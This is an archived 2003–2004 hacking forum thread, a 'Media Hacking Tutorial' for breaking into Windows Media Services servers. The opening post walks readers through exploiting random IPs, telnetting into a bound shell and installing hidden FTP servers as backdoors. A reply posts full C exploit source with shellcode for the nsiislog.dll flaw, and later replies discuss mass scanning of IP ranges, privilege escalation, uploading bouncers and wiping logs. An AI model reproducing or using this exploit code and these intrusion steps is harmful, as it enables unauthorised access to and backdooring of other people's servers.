Media Hacking Tutorial

GovernmentSecurity.org > The Archives > Exploit Articles

Kyoshichou

Sep 8 2003, 05:09 PM

ok Here we go:
_______________
What you need:
asd.exe
media ip
_______________

Ok first download asd.exe you can find it @ hxxp://www.geocities.com/mach8442000/asd.zip

Ok here we go.

Step 1) Open Msdos and typ cd\ (enter) than typ asd ip you wanna hack 34816 (enter)
if he says exploited than he is online and maybe hackable!
Than typ telnet ip that you wanna hack 34816 (enter) if you get in you will see

If not than take a other ip!

Step 2) So you are in the machine. Well typ now cd\ (enter) than cd inetpub\scripts (enter)
why i do that? because you only can up in c:\inetpub\scripts. Now you need to up your files.
I don't know wich program you use winmgnt.exe or servudaemon.exe but thats up to you.
-------------------------------------------------------------------------------------------
Ok i suppose that you guys know how to up the files if not tell me i make a tut for it!
-------------------------------------------------------------------------------------------

Ok when you upped your files typ: c:\inetpub\scripts\servudaemon.exe /i /h /s (i suppose
that u upped servudaemon.exe if you upped winmngt.exe command:
c:\inetpub\scripts\winmgnt.exe /i /h /s .)
When you did that do this command: start servudaemon or start winmgnt AND HOPPA YOU HACKED
IT! Try to login, if he says connection refused there is a router or something.

ONE POINT: When you make a typ mistake you can't remove the mistake so you guys know it!
Than you must typ it again.

Good luck

Kyo...

Lostuse

Sep 9 2003, 12:04 AM

nice tut but i cant figure out how to get the files up there i cant start up ftp -i -s:c: to get the files it gives me an error

Nostra

Sep 12 2003, 01:58 AM

nice tut, but it´s wrong that you can upload the files only to inetpub\scrits or recycler...
in winnt\temp for example you can upload too... I mostenly make a dir like winnt\temp\system32\cgi-bin\admin or something simmilar

SLiM577

Sep 9 2003, 02:32 AM

is there a media scanner out there?

flap

Sep 9 2003, 06:01 AM

dont forget c:\recycler ... but however... till today i haven't sploited a media box with enough right to install a service and net start 'em... so i am very curious how u are able to do it

thavirus

Sep 9 2003, 12:31 PM

u can upload your files but you cant install your serv-u because you don't have the rights! Starting standalone files will work, like bouncer.exe!

greetz

flap

Sep 9 2003, 01:56 PM

yeah i know... always has been the prob with wms... but i am just curious.. how can somebody write a tutorial about something that is impossible to do

... lil weird to me

Iltis

Sep 9 2003, 02:33 PM

you have to gain adminstrator rights wih a local root exploit

so sry Kyoshichou your tut isn't really good althaugh evereything is correct

greetz Iltis

Steffan

Sep 9 2003, 04:58 PM

Is there a source code out there from this tool ????

I would like to have it...

THX a lot !!¨

C'ya

Kyoshichou

Sep 9 2003, 05:39 PM

everthing is allright but you're right too; you have to be able to execute

VincentVega

Sep 9 2003, 06:23 PM

I have a remote shell here but no dir inetpub?

CODE

Directory of C:\

01/03/2003 08:09p <DIR> BACKUP
01/13/2003 02:40p <DIR> DELL
01/03/2003 08:09p 2,799 DELL.SDR
01/04/2003 02:28a <DIR> Documents and Settings
01/03/2003 08:14p <DIR> DRIVERS
08/23/2002 08:17a <DIR> I386
01/13/2003 03:44p 0 IO.SYS
01/13/2003 03:44p 0 MSDOS.SYS
06/04/2003 06:28a <DIR> mysql
01/13/2003 04:07p <DIR> Perl
04/06/2003 08:00a <DIR> PrgmZips
07/28/2003 06:55a <DIR> Program Files
07/28/2003 06:55a <DIR> WINNT

What to do?

jurk-off

Sep 9 2003, 08:12 PM

hehey dude ook here??

Imps2

Sep 10 2003, 09:33 AM

In shell try dir scripts /s to find the scripts dir or look for other disks

danv

Sep 10 2003, 03:12 PM

please explain how to upload the files

CraZy_A

Sep 10 2003, 11:52 PM

QUOTE (Steffan @ Sep 9 2003, 04:58 PM)

Is there a source code out there from this tool ????

I would like to have it...

THX a lot !!¨

C'ya

yes there is

hmm dont see upload file option :/

anyways here it is "firew0rker.c"

// Windows Media Services Remote Command Execution #2
// v. 1.0 beta
// © firew0rker //tN [The N0b0D1eS]

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#ifdef WIN32
#include <winsock.h>
#pragma comment(lib, "wsock32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#define SOCKET int
#define DWORD uint32_t
#define ULONG unsigned long
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define closesocket close
#endif

char shellcode[]=
//"\x90\x90\x90\x90\x90\x90\x90\xCC" //¤«ïâ¤ª¨
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
"\xff\x5b\x81\xeb\x4d\x43\x22\x11"
"\x8b\xc3\x05\x66\x43\x22\x11\x66"
"\xb9\x15\x03\x80\x30\xfb\x40\x67"
"\xe2\xf9\x33\xa3\xf9\xfb\x72\x66"
"\x53\x06\x04\x04\x76\x66\x37\x06"
"\x04\x04\xa8\x40\xf6\xbd\xd9\xea"
"\xf8\x66\x53\x06\x04\x04\xa8\x93"
"\xfb\xfb\x04\x04\x13\x91\xfa\xfb"
"\xfb\x43\xcd\xbd\xd9\xea\xf8\x7e"
"\x53\x06\x04\x04\xab\x04\x6e\x37"
"\x06\x04\x04\xf0\x3b\xf4\x7f\xbe"
"\xfa\xfb\xfb\x76\x66\x3b\x06\x04"
"\x04\xa8\x40\xba\xbd\xd9\xea\xf8"
"\x66\x53\x06\x04\x04\xa8\xab\x13"
"\xcc\xfa\xfb\xfb\x76\x7e\x8f\x05"
"\x04\x04\xab\x93\xfa\xfa\xfb\xfb"
"\x04\x6e\x4b\x06\x04\x04\xc8\x20"
"\xa8\xa8\xa8\x91\xfd\x91\xfa\x91"
"\xf9\x04\x6e\x3b\x06\x04\x04\x72"
"\x7e\xa7\x05\x04\x04\x9d\x3c\x7e"
"\x9f\x05\x04\x04\xf9\xfb\x9d\x3c"
"\x7e\x9d\x05\x04\x04\x73\xfb\x3c"
"\x7e\x93\x05\x04\x04\xfb\xfb\xfb"
"\xfb\x76\x66\x9f\x05\x04\x04\x91"
"\xeb\xa8\x04\x4e\xa7\x05\x04\x04"
"\x04\x6e\x47\x06\x04\x04\xf0\x3b"
"\x8f\xe8\x76\x6e\x9c\x05\x04\x04"
"\x05\xf9\x7b\xc1\xfb\xf4\x7f\x46"
"\xfb\xfb\xfb\x10\x2f\x91\xfa\x04"
"\x4e\xa7\x05\x04\x04\x04\x6e\x43"
"\x06\x04\x04\xf0\x3b\xf4\x7e\x5e"
"\xfb\xfb\xfb\x3c\x7e\x9b\x05\x04"
"\x04\xeb\xfb\xfb\xfb\x76\x7e\x9b"
"\x05\x04\x04\xab\x76\x7e\x9f\x05"
"\x04\x04\xab\x04\x4e\xa7\x05\x04"
"\x04\x04\x6e\x4f\x06\x04\x04\x72"
"\x7e\xa3\x05\x04\x04\x07\x76\x46"
"\xf3\x05\x04\x04\xc8\x3b\x42\xbf"
"\xfb\xfb\xfb\x08\x51\x3c\x7e\xcf"
"\x05\x04\x04\xfb\xfa\xfb\xfb\x70"
"\x7e\xa3\x05\x04\x04\x72\x7e\xbf"
"\x05\x04\x04\x72\x7e\xb3\x05\x04"
"\x04\x72\x7e\xbb\x05\x04\x04\x3c"
"\x7e\xf3\x05\x04\x04\xbf\xfb\xfb"
"\xfb\xc8\x20\x76\x7e\x03\x06\x04"
"\x04\xab\x76\x7e\xf3\x05\x04\x04"
"\xab\xa8\xa8\x93\xfb\xfb\xfb\xf3"
"\x91\xfa\xa8\xa8\x43\x8c\xbd\xd9"
"\xea\xf8\x7e\x53\x06\x04\x04\xab"
"\xa8\x04\x6e\x3f\x06\x04\x04\x04"
"\x4e\xa3\x05\x04\x04\x04\x6e\x57"
"\x06\x04\x04\x12\xa0\x04\x04\x04"
"\x04\x6e\x33\x06\x04\x04\x13\x76"
"\xfa\xfb\xfb\x33\xef\xfb\xfb\xac"
"\xad\x13\xfb\xfb\xfb\xfb\x7a\xd7"
"\xdf\xf9\xbe\xd9\xea\x43\x0e\xbe"
"\xd9\xea\xf8\xff\xdf\x78\x3f\xff"
"\xab\x9f\x9c\x04\xcd\xfb\xfb\x72"
"\x9e\x03\x13\xfb\xfb\xfb\xfb\x7a"
"\xd7\xdf\xd8\xbe\xd9\xea\x43\xac"
"\xbe\xd9\xea\xf8\xff\xdf\x78\x3f"
"\xff\x72\xbe\x07\x9f\x9c\x72\xdd"
"\xfb\xfb\x70\x86\xf3\x9d\x7a\xc4"
"\xb6\xa1\x8e\xf4\x70\x0c\xf8\x8d"
"\xc7\x7a\xc5\xab\xbe\xfb\xfb\x8e"
"\xf9\x10\xf3\x7a\x14\xfb\xfb\xfa"
"\xfb\x10\x19\x72\x86\x0b\x72\x8e"
"\x17\x70\x86\xf7\x42\x6d\xfb\xfb"
"\xfb\xc9\x3b\x09\x55\x72\x86\x0f"
"\x70\x34\xd0\xb6\xf7\x70\xad\x83"
"\xf8\xae\x0b\x70\xa1\xdb\xf8\xa6"
"\x0b\xc8\x3b\x70\xc0\xf8\x86\x0b"
"\x70\x8e\xf7\xaa\x08\x5d\x8e\xfe"
"\x78\x3f\xff\x10\xf1\xa2\x78\x38"
"\xff\xbb\xc0\xb9\xe3\x8e\x1f\xc0"
"\xb9\xe3\x8e\xf9\x10\xb8\x70\x89"
"\xdf\xf8\x8e\x0b\x2a\x1b\xf8\x3d"
"\xf4\x4c\xfb\x70\x81\xe7\x3a\x1b"
"\xf9\xf8\xbe\x0b\xf8\x3c\x70\xfb"
"\xf8\xbe\x0b\x70\xb6\x0f\x72\xb6"
"\xf7\x70\xa6\xeb\x72\xf8\x78\x96"
"\xeb\xff\x70\x8e\x17\x7b\xc2\xfb"
"\x8e\x7c\x9f\x9c\x74\xfd\xfb\xfb"
"\x78\x3f\xff\xa5\xa4\x32\x39\xf7"
"\xfb\x70\x86\x0b\x12\x99\x04\x04"
"\x04\x33\xfb\xfb\xfb\x70\xbe\xeb"
"\x7a\x53\x67\xfb\xfb\xfb\xfb\xfb"
"\xfa\xfb\x43\xfb\xfb\xfb\xfb\x32"
"\x38\xb7\x94\x9a\x9f\xb7\x92\x99"
"\x89\x9a\x89\x82\xba\xfb\xbe\x83"
"\x92\x8f\xab\x89\x94\x98\x9e\x88"
"\x88\xfb\xb8\x89\x9e\x9a\x8f\x9e"
"\xab\x89\x94\x98\x9e\x88\x88\xba"
"\xfb\xfb\xac\xa8\xc9\xa4\xc8\xc9"
"\xd5\xbf\xb7\xb7\xfb\xac\xa8\xba"
"\xa8\x94\x98\x90\x9e\x8f\xba\xfb"
"\x99\x92\x95\x9f\xfb\x97\x92\x88"
"\x8f\x9e\x95\xfb\x9a\x98\x98\x9e"
"\x8b\x8f\xfb\xac\xa8\xba\xa8\x8f"
"\x9a\x89\x8f\x8e\x8b\xfb\x98\x97"
"\x94\x88\x9e\x88\x94\x98\x90\x9e"
"\x8f\xfb\xfb\x98\x96\x9f\xfb\xe9"
"\xc4\xfc\xff\xff\x74\xf9\x75\xf7";

const DWORD default_EIP_pos = 9992; //¯®«®¦¥¨¥ EIP ¢ ¡ãà(sploit)
const DWORD default_EBX_points_to = 9988; //ã§ ⥫ì EBX ®⭮á¥«쭮 sploit
//const DWORD default_EIP_value = 0x77F8441B; //¯® í¬ã¤à¤.¡. JMP EDX, ¢ ¤ ®¬ áç í ¢ ntdll.dll
const DWORD default_EIP_value = 0x40F01333;
//const default_EDX_points_to = 0x1000; //í ¥ ¯ਣ®¤¨«®á
char *nsiislog_default = "/scripts/nsiislog.dll";
char sploit[default_EIP_pos+4+sizeof(shellcode)+1];
char sploitbuf[sizeof(sploit)*2];

void usage(char* argv[])
{
printf("Dicklamer (: "
"We are not responsible for the illegal use of this software.\n"
"Description: Binds shell to port 34816 (or higher if port busy).\n"
"Usage: "
"%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n"
"Supported target(s):\n"
"Windows version\t\t\t\tnsiislog.dll version\n"
"------------------------------------------------------------\n"
"2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]);
exit(0);
}

int main(int argc, char* argv[])
{
#ifdef WIN32
WSADATA wsaData;
#endif
int target_port = 80;
char *nsiislog = nsiislog_default;
int nArgIndex;

if (argc<2) usage(argv);
nArgIndex = 1;
while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-'))
{
switch (argv[nArgIndex++][1])
{
case 'p':
case 'P':
target_port = atoi(argv[nArgIndex++]);
continue;
case 'r':
case 'R':
nsiislog = argv[nArgIndex++];
continue;
default:
usage(argv);
}
}

try {
#ifdef WIN32
WSAStartup(0x0101, &wsaData);
#endif
SOCKET s = socket(AF_INET,SOCK_STREAM,0);
if (s == INVALID_SOCKET) throw("No socket");
sockaddr_in addr;

//.¯।¥«塞 ¤à á¢ ª
ULONG iaddr = inet_addr(argv[1]);
if (iaddr == INADDR_NONE) {//.¤à - ¨¬ï¥àª
hostent *ph = gethostbyname(argv[1]);
if (!ph) throw("Cant resolve hostname");
memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr));
} else {//.¤à - IP
memcpy(&addr.sin_addr.s_addr,&iaddr,4);
};

addr.sin_family = AF_INET;
addr.sin_port = htons(target_port);
int sizeofaddr=sizeof(addr);

char *req = "MX_STATS_LogLine: ";
strcpy(sploit, req);
memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req));
//memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*ã â\0*/);
memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*ã â\0*/);
//¯à¯¥à®¤¥ EIP, EBX ¡㤥âª §ëâ ¯®᫥¤¨© DWORD 襣® § ¯à , £¤¥ JZ/JNZ
memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value);

/*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/
sploit[sizeof(sploit)-1] = 0;

if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host");

sprintf(sploitbuf,
"POST %s HTTP/1.0\r\n"
"Accept: */*\r\n"
"User-Agent: NSPlayer/4.1.0.3917\r\n"
"Content-Type: text/plain\r\n"
"Content-Length: %i\r\n"
"Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n"
"\r\n%s\r\n",
nsiislog,strlen(sploit),sploit);

int snd=send(s,sploitbuf,strlen(sploitbuf),0);
if (snd == strlen(sploitbuf)) printf("Target exploited.\n");
else throw("Cant send exploit");
closesocket(s);
}
catch (char *errmsg)
{

printf("%s\n",errmsg);
return -1;
}
catch (int err_n)
{
printf("error %i\n",err_n);
return err_n;
}
#ifdef WIN32
WSACleanup();
#endif
return 0;
}

CraZy_A

Sep 10 2003, 11:56 PM

QUOTE (Kyoshichou @ Sep 8 2003, 05:09 PM)

Ok when you upped your files typ: c:\inetpub\scripts\servudaemon.exe /i /h /s (i suppose
that u upped servudaemon.exe if you upped winmngt.exe command:
c:\inetpub\scripts\winmgnt.exe /i /h /s .)

wtf is that /i /h /s bullshit mix?

i know what everything does ALONE but all together???

hmmm just for the record got 3 iismedia shells till today

1 with system rights
2 with iusr rights
tried iiscrack aka httpodbc.dll and system is patched :/
didnt had luck with other escalation tools... anyone got a usefull tool?

ismael86

Jan 4 2004, 02:24 PM

i get Target Exploited but when i connect with telnet to port 34816 it does not connect?

GhostCow

Jan 4 2004, 07:15 PM

if you got standalone execution option, then execute winshell for admin cmd shell... (i think its admin, it always worked for me)

HotN0b0dy

Jan 4 2004, 08:01 PM

may i ask..how can i gain target IP?
are there any scanners? if there are..can u tell me their names?
i'll try to find them alone first..then i'll ask u

headbanger

Jan 4 2004, 08:15 PM

QUOTE (HotN0b0dy @ Jan 4 2004, 08:01 PM)

may i ask..how can i gain target IP?
are there any scanners? if there are..can u tell me their names?
i'll try to find them alone first..then i'll ask u

scan1000 scans media.. but u wont get very far with media results because most of the time u dont have enough rights.

search for scan1000 on this board or on google.

HotN0b0dy

Jan 4 2004, 09:07 PM

yes downloaded it from this board
i ran it..but it opens, and letters write down, and then it closes

killpart

Jan 4 2004, 09:41 PM

why all so comply.
scan with scan100/scan500/scan1000 -media
the results exploit i with a tool.
this results i use a prog who connect per shel and i can send my script.

HotN0b0dy

Jan 4 2004, 09:57 PM

somethin' about security
can be anything wrong if i scan from my local computer? cuz i'm doing this 1st time..so i'm not sure
and can u tell me few ranges that u scan? what range has china?
Thank You
p.s:
i figured out how to scan..i think so

headbanger

Jan 5 2004, 12:41 AM

QUOTE (HotN0b0dy @ Jan 4 2004, 09:07 PM)

yes downloaded it from this board
i ran it..but it opens, and letters write down, and then it closes

you need to open it through cmd.exe

goto start--run and type cmd

then goto where scan1000 is located

then type scan1000 -media ipstart ipend ..

tstngry

Jan 5 2004, 04:08 AM

What prog should i use to compile this? I tried dev c++ but i get errors. I would appreciate some suggestions. Thnx in advance

thotho

Jan 5 2004, 06:28 AM

thanks 4 the Tutorial

HotN0b0dy

Jan 5 2004, 01:48 PM

so there's nothin wrong if i scan from my home computer?

zarp

Jan 5 2004, 02:36 PM

mm from your pc isn t a pb ;p lol

i have scan remotly and i have found some targets but after asd ip 34816 never any telnet which is ok :/

maybe bad range lol or fuckingfirewall or patch

HotN0b0dy

Jan 5 2004, 03:34 PM

yeah..i suppose pb means preety bad. damn...forget this 1337 speech and write normal pls
thx

headbanger

Jan 5 2004, 10:44 PM

QUOTE (CraZy_A @ Sep 10 2003, 11:56 PM)

QUOTE (Kyoshichou @ Sep 8 2003, 05:09 PM)

Ok when you upped your files typ: c:\inetpub\scripts\servudaemon.exe /i /h /s (i suppose
that u upped servudaemon.exe if you upped winmngt.exe command:
c:\inetpub\scripts\winmgnt.exe /i /h /s .)

the /i /h /s is just so it would be hidden and not pop up the ftp server gui

its useless if u use winmgnt.exe because it does it automatically

cha0s

Jan 6 2004, 11:56 AM

thx 4 this xpl checking it after scan is complete

HotN0b0dy

Jan 6 2004, 04:42 PM

re
i'd like to ask..how can i upload and run bnc on that kind of shells
taiwan shells are also 'hackable' i found out
pls help me
thx

Kaarel

Jan 6 2004, 10:52 PM

Anybody can say how do secure media and how to delete logs on media (I know that in media isnt admin right but meyby there is some way to do that)

HotN0b0dy

Jan 8 2004, 08:09 PM

i'd just like to ask once again, if anyone knows how to upload bnc on media box?
i'd really aprechiate your help
ty

B1G

Feb 25 2004, 06:26 PM

what about logs on the target machine?

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.